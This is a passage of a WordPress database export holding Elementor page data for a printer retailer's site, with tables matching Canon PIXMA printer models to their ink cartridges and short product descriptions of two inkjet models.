width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6846,3291,'_elementor_version','2.5.14'),(6856,3293,'_wp_page_template','template-fullwidth.php'),(6849,3292,'_wp_page_template','template-fullwidth.php'),(6850,3292,'_elementor_edit_mode','builder'),(6851,3292,'_elementor_template_type','post'),(6852,3292,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0<span style=\\\"font-size: 0.875rem;\\\">Printing for Low-Cost Printing<\\/span><\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 